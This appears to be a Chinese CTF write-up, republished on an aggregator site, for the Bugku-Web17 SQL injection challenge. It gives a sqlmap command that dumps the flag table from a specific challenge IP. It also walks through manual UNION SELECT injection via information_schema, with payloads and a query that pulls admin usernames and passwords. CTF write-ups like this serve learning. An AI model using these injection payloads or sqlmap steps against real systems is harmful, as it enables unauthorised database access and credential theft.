Bugku-Web17

KAKSKY / 2023-08-29 / 原文

这是sql的注入题

我自己的sql注入学的还不是很到位,这个题目有很学习的意味:;;

images
第一个是通过sqlmap的注入的方式:

python3 .\sqlmap.py -u "http://114.67.246.176:18696/index.php" --method POST --data "id=1" -D skctf -T fl4g -C skctf_flag --dump

images
python sqlmap.py -u url --method POST --data "id=1" 是post提交参数的sqlmap格式

① 用 --dbs 获取数据库
② 用 -D 数据库名 --tables 爆出表名
③ 用 -D 数据库名 -T 表名 --columns 爆出字段名
④ 用 -D 数据库名 -T 表名 -C 字段名 --dump 爆出数据

第二个是通过手工注入的方式:
感觉博主讲的挺好的,所以想就摘抄下来了,

知识补充:union select 手工注入
mysql中的information_schema 结构用来存储数据库系统信息 

information_schema 结构中这几个表存储的信息,在注射中可以用到的几个表  

SCHEMATA 存储数据库名的, 

关键字段:SCHEMA_NAME,表示数据库名称 

TABLES 存储表名的 

关键字段:TABLE_SCHEMA表示表所属的数据库名称; 

TABLE_NAME表示表的名称 

COLUMNS 存储字段名的 

关键字段:TABLE_SCHEMA表示表所属的数据库名称; 

TABLE_NAME表示所属的表的名称 

COLUMN_NAME表示字段名 

 

爆所有数据名 

select group_concat(SCHEMA_NAME) from information_schema.schemata 

得到当前库的所有表 

select group_concat(table_name) from information_schema.tables where table_schema=database() 

得到表中的字段名(列名) 将敏感的表进行16进制编码adminuser=0x61646D696E75736572

select group_concat(column_name) from information_schema.columns where table_name=0x61646D696E75736572 

得到字段(列)具体的值     select group_concat(username,0x3a,password) from adminuser

group_concat()函数是将数据作为字符串输出,中间以:间隔开(因为0x3a是:的16进制ascii码)

操作过程中需要注意:

table_name

select group_concat(table_name) from information_schema.tables where table_schema=database()

column_name

select group_concat(column_name) from information_schema.columns where table_name='fl4g'

images
images
images

images
images
images

images
id=0' union select 1,(select group_concat(table_name) from information_schema.tables where table_schema=database()),user(),version()#

images
id=0' union select 1,(select group_concat(column_name) from information_schema.columns where table_name='fl4g'),user(),version()#

images
images

Bugku-Web17更多相关文章

【游记】CCPC 济南 2024 游记

python bytecode解析

ansible进阶与自动化

RK3568开发板Openwrt文件系统构建

动态网络架构

机器学习入门

沨鸾的Shell小技巧

为你的手机内核开启docker支持

在Linux下优雅的调试C语言

浅析Dockerhub API:如何优雅地从dockerhub偷rootfs镜像

C# 通过注册表、API两种方式获取显示器的分辨率尺寸

2024.10.31 文件管理方案

python练习题

Kinsta-博客中文翻译-八-

JAX---Flax-深度学习教程-一-

Java-中文官方教程-2022-版-二-

JavaTutorialNetwork-中文系列教程-一-

JavaBeginnersTutorial-中文系列教程-一-

JavaTutorialNetwork-中文系列教程-二-

JavaBeginnersTutorial-中文系列教程-二-

随机推荐

yolo --- 核心思想

【游记】CCPC 济南 2024 游记

AJAX & AXIOS-2024/11/1

验证码处理在自动化测试中的应用

一些学科笑话

NOIP2024模拟赛20 & 11.1 小记

20241101 数据结构与算法期中机试收获

Java,启动!

什么是IT技术

即将到来!

2024/11/1日 日志 关于JavaScript简介&引入方式 以及基础语法的学习

舍得-时间-工作是人的一生最重要的事情-自己要有私房钱-人的一生最重要的事情是书写自己的人生

2.TiUP 部署 DM 集群

原型模式的C++实现

python bytecode解析

09-XSS键盘监听、cookie窃取&文件上传绕过

ubuntu 24.04 部署 mysql 8.4.3 LTS

国标GB28181公网平台LiteGBS国标GB28181视频平台建筑工地无线视频联网监控系统方案

imes完工下线

android 13 更改手机信号调整

热门话题

Ethernaut Level 11: Elevator Attack and Blockchain Interaction

快速部署开源spug运维平台的Docker安装指南

驱动调试之printk的原理与使用

计算机思维模型及其应用

华为云发布代码大模型PanGu-Coder2,实现高效代码生成

Linux多硬盘数据存储和分区操作

构建高可用架构: 分层冗余与自动故障转移

LoRA:高效调参的大语言模型适应方法

《分布式系统的基本原理及互联网分层架构的本质》

Hadoop写流程解析

Java架构师的系统架构设计方法论中的规范要点

使用observeDOM解决BetterScroll插件在移动端无法滑动的问题

互联网一致性架构设计实践

高并发系统架构与水平扩展

混合应用的崛起:跨平台开发取代原生应用

  穗舟网 (www.seizhou.com)

本站除标明"本站原创"外所有文章版权归创作人所有,本站不承担任何法律责任和连带责任,如有冒犯请直接联系,我们将立即予以纠正并致歉。

Powered by WordPress  ·  v1.0.0-alpha